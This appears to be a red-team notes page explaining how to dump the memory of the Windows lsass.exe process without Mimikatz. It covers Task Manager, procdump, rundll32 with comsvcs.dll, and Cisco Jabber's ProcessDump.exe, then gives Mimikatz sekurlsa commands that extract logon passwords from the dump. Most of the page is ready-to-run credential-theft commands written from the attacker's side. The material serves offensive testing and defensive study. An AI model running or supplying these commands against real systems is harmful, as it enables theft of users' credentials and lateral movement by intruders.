> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz.md).

# Dumping Lsass Without Mimikatz

## MiniDumpWriteDump API

See my notes about writing a simple custom process dumper using `MiniDumpWriteDump` API:

{% content-ref url="/pages/-LafIF6VCybVpgbjcbLd" %}
[Dumping Lsass without Mimikatz with MiniDumpWriteDump](/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass.md)
{% endcontent-ref %}

## Task Manager

Create a minidump of the lsass.exe using task manager (must be running as administrator):

![](/files/-L_nTRoRHqLqkBWb_aw4)

![](/files/-L_nTYMBz-VWM11dadu6)

Swtich mimikatz context to the minidump:

{% code title="attacker\@mimikatz" %}

```csharp
sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords
```

{% endcode %}

![](/files/-L_nT6tDqGhJv_fdKOnw)

## Procdump

Procdump from sysinternal's could also be used to dump the process:

{% code title="attacker\@victim" %}

```csharp
procdump.exe -accepteula -ma lsass.exe lsass.dmp

// or avoid reading lsass by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
```

{% endcode %}

![](/files/-L_nX2I6LfCsWLSkjzwg)

![](/files/-L_nXVaJRSNnJZayxbL_)

## comsvcs.dll

Executing a native comsvcs.dll DLL found in Windows\system32 with rundll32:

```
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
```

![](/files/-LoG1NZ07abmT8sRpq5j)

## ProcessDump.exe from Cisco Jabber

Sometimes Cisco Jabber (always?) comes with a nice utility called `ProcessDump.exe` that can be found in `c:\program files (x86)\cisco systems\cisco jabber\x64\`. We can use it to dump lsass process memory in Powershell like so:

```
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp
```

![screenshot by @em1rerdogan](/files/-MIN_LsfWiT70TxZoUgc)

## References

{% embed url="<https://t.co/s2VePo3ICo?amp=1>" %}
